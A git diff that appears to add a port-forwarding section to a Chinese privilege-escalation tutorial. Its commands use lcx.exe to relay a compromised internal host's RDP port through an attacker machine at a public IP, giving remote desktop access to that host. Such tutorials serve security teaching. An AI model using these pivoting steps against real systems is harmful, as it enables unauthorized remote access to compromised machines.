lcx

漏洞篇 提权.md

@@ -78,3 +78,47 @@
 ![](http://ww4.sinaimg.cn/large/841aea59jw1fb4cdsd6xgj20hq04174a.jpg)
 
 可以看到突破了限制。
+
+## 端口转发
+
+在提权过程中，我们经常碰到这样的情况：
+
+![](http://ww4.sinaimg.cn/large/841aea59jw1fb56mw6pk7j20d508mwew.jpg)
+
+我们可以看到 WebShell 的主机处于内网下，内网的意思就是说，它能连接别人，但别人不能连接它，就跟连接路由器的个人电脑差不多。
+
+那么这种情况下，我们就需要用到端口转发工具`lcx.exe`，除此之外，还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡，独立 IP 主机叫做本机。
+
+将`lcx.exe`上传至本机和肉鸡之后，首先确定本机的 IP 为`119.90.140.191`：
+
+![](http://ww3.sinaimg.cn/large/841aea59jw1fb56n00sppj208h020743.jpg)
+
+然后我们在本机执行：
+
+```
+lcx.exe -listen 51 3388
+```
+
+![](http://ww1.sinaimg.cn/large/841aea59jw1fb56n2ux6ej20gt07kjrv.jpg)
+
+这条命令的意思就是说，监听本机的 51 和 3388 端口，并将两个端口互相转发，端口 51 的入境流量发给端口 3388，反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口，为了避免与本机的远程连接服务冲突，选择了 3388。大家可以自行选择其他未占用端口。
+
+然后我们在肉鸡上执行：
+
+```
+lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389
+```
+
+![](http://ww2.sinaimg.cn/large/841aea59jw1fb56n5zhs8j20lo026glh.jpg)
+
+这条命令连接肉鸡的 3389 端口，和本机的 51 端口，并互相转发。
+
+之后，我们在本机或其他主机上使用远程连接客户端，连接`119.90.140.191:3388`，可以看到`lcx`中显示了转发的信息。
+
+![](http://ww1.sinaimg.cn/large/841aea59jw1fb56n8h5txj20gt0a10tg.jpg)
+
+远程连接客户端的封包会发给主机的`lcx`，之后会发给肉鸡的`lcx`，之后会发给肉鸡的远程连接服务。响应封包会按原路返回。
+
+等待一会儿之后，我们成功连接了肉鸡的远程桌面：
+
+![](http://ww1.sinaimg.cn/large/841aea59jw1fb56nbetaaj20j50cjgll.jpg)